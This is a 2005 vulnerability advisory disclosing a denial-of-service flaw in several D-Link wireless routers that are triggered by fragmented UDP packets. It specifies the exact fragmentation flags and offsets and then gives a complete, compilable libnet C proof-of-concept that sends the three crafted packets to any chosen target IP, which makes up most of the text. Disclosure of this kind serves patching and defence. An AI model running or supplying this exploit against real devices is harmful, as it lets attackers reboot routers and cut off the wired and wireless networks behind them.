dlink_udp_dos.txt

`  
At the time of discovery the issue affected the latest D-Link firmwares.  
As D-Link has since released a new firmware, this is no longer the case, so...  
cheers...  
  
---  
Aaron Portnoy  
  
------------------------------------------------------------------------------------  
  
  
D-Link Fragmented UDP Denial of Service Vulnerability  
  
Aaron Portnoy, aportnoy () ccs . neu . edu || deft () thunkers . net  
http://www.thunkers.net/~deft/advisories/dlink_udp_dos.txt  
December 8, 2005  
  
  
DESCRIPTION  
-----------  
  
Remote exploitation of a design error flaw in multiple D-Link wireless access  
points could allow attackers to create a denial of service condition on the  
affected machine and therefore the wired and wireless network itself.  
  
Code execution is believed to be possible, but considering D-Link has since  
patched this issue I've dropped the research. This issue was discovered before  
said patch was released. Similar fragmentation vulns in Dlink products have  
been  
released in the past, but as this vulnerability affects the latest firmware (at  
the time of this writing) I consider this still somewhat legit.  
  
I myself don't know too much about hardware exploitation, so I leave this up to  
the better suited of you out there.  
  
  
ANALYSIS  
---------  
  
Successful exploitation of the described vulnerability allows remote attackers  
to reboot the target router. Exploitation will occur given that the attacker  
send 3 successive fragmented UDP packets with the following specifications:  
  
  
All packets must have the same Identification Number in the IP Header.  
  
Packet 1:  
The MORE_FRAGMENTS flag must be set to 1. (value IP_MF)  
The fragmentation offset equal to 0.  
The packet's payload size consists of 8 bytes. NULL bytes were tested in  
the proof of concept.  
  
Packet 2:  
The MORE_FRAGMENTS flag set to 1. (value 0x2002)  
The fragmentation offset equal to 16.  
Payload is 8 bytes long.  
  
Packet 3:  
The MORE_FRAGMENTS flag set to 0. (value 0x0003)  
The fragmentation offset equal to 24.  
Payload is 8 bytes long.  
  
In tests the affected routers would instantly terminate all current  
connections. The DI-524 would take approximately one minute to then reboot  
and restore a connections. The DI-624 would take approximately 30 seconds.  
  
  
MITIGATING FACTORS  
-------------------  
  
This vulnerability has been confirmed to work from at most 4 hops from the  
intended target. Depending on how routers/switches and other hardware placed  
between the attacker and the router further fragment or reassembly the packets,  
the denial of service condition may not be triggered.  
  
  
DETECTION  
----------  
  
The following hardware and firmware versions are confirmed vulnerable:  
  
* D-Link DI-524 Wireless Router, firmware 3.20 August 18, 2005 (latest  
firmware at the time of this writing)  
  
* D-Link DI-624 Wireless Router, unknown firmware  
  
* D-Link DI-784, unknown firmware  
  
* REPORTED: US Robotics' USR8054.  
  
  
The following hardware do not appear to be vulnerable:  
  
* D-Link DI-614+ Wireless Router  
  
* D-Link DI-604 Ethernet Broadband Router  
  
  
  
CREDIT  
------  
  
Vulnerability discovered by Aaron Portnoy (deft () thunkers ! net) and Keefe  
Johnson.  
  
  
EXPLOIT CODE  
------------  
  
The following proof of concept code successfully triggers the denial of service  
condition:  
  
  
/*  
*  
* Aaron Portnoy  
*  
* silc.thunkers.net, thunkers  
*  
* D-Link Wireless Access Point  
* Fragmented UDP DoS Proof of Concept  
*  
*  
* gcc -o dlink_dos dlink_dos.c -lnet -Wall  
*  
*/  
  
#include <libnet.h>  
  
#define DEVICE "eth0"  
#define SRC_IP "127.0.0.1"  
#define DST_IP "127.0.0.1"  
#define SRC_PRT 200  
#define DST_PRT 11111  
  
void usage (char *name)  
{  
fprintf (stderr,  
"Usage: %s -s <source ip> -d <destination ip>\  
-a <source port> -b <destination port>\n",  
name);  
  
exit (EXIT_FAILURE);  
}  
  
int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,  
u_short dPRT, int count)  
{  
  
libnet_t *l = NULL;  
libnet_ptag_t udp = 0;  
libnet_ptag_t ip = 0;  
  
char errbuf[LIBNET_ERRBUF_SIZE];  
char *payload = NULL;  
u_short payload_s = 0, src_prt, dst_prt;  
u_long src_ip, dst_ip;  
int c, frag;  
  
if (!device)  
device = DEVICE;  
  
l = libnet_init (LIBNET_RAW4, device, errbuf);  
  
if (!l) {  
fprintf (stderr, "libnet_init() failed: %s\n", errbuf);  
exit (EXIT_FAILURE);  
}  
  
src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :  
libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);  
  
dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :  
libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);  
  
src_prt = sPRT ? sPRT : SRC_PRT;  
  
dst_prt = dPRT ? dPRT : DST_PRT;  
  
if (count == 1) {  
payload = "\0\0\0\0\0\0\0\0";  
payload_s = 8;  
}  
  
udp = libnet_build_udp (src_prt,  
dst_prt,  
(LIBNET_UDP_H + payload_s) * 2,  
0, (unsigned char *)payload, payload_s, l, udp);  
  
if (udp == -1) {  
fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l));  
exit (EXIT_FAILURE);  
}  
  
switch (count) {  
  
case 1:  
frag = IP_MF;  
break;  
  
case 2:  
frag = 0x2002;  
break;  
  
case 3:  
frag = 0x0003;  
break;  
}  
  
ip = libnet_build_ipv4 (20,  
0,  
1800,  
frag,  
128,  
IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);  
  
if (ip == -1) {  
fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l));  
exit (EXIT_FAILURE);  
}  
  
c = libnet_write (l);  
  
if (c == -1) {  
fprintf (stderr, "Write error: %s\n", libnet_geterror (l));  
exit (EXIT_FAILURE);  
}  
  
printf ("Wrote UDP packet; check the wire.\n");  
  
libnet_destroy (l);  
  
return (EXIT_SUCCESS);  
  
}  
  
int main (int argc, char **argv)  
{  
  
int i;  
char *pDST, *pSRC, *device;  
u_short dPRT = 0;  
u_short sPRT = 0;  
  
pDST = pSRC = device = NULL;  
  
while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) {  
switch (i) {  
case 'D':  
device = optarg;  
break;  
case 'd':  
pDST = optarg;  
break;  
case 's':  
pSRC = optarg;  
break;  
case 'a':  
sPRT = atoi (optarg);  
break;  
case 'b':  
dPRT = atoi (optarg);  
break;  
case 'h':  
usage (argv[0]);  
break;  
}  
}  
  
printf ("\n----------------------------------\n");  
printf (" -= D-Link DoS PoC =-\n");  
printf (" Aaron Portnoy\n");  
printf (" deft () thunkers ! net \n");  
printf (" silc.thunkers.net, thunkers\n");  
printf ("----------------------------------\n");  
  
  
device ? printf ("\nDevice: \t%s\n", device) :  
printf ("\nDevice: \t%s\n", DEVICE);  
  
pSRC ? printf ("SRC IP: \t%s\n", pSRC) :  
printf ("SRC IP: \t%s\n", SRC_IP);  
  
pDST ? printf ("DST IP: \t%s\n", pDST) :  
printf ("DST IP: \t%s\n", DST_IP);  
  
sPRT ? printf ("SPort: \t\t%d\n", sPRT) :  
printf ("SPort: \t\t%d\n", SRC_PRT);  
  
dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) :  
printf ("DPort: \t\t%d\n\n", DST_PRT);  
  
for (i = 1; i <= 3; i++)  
gen_packet (device, pSRC, pDST, sPRT, dPRT, i);  
printf ("\n");  
  
return (EXIT_SUCCESS);  
}  
  
`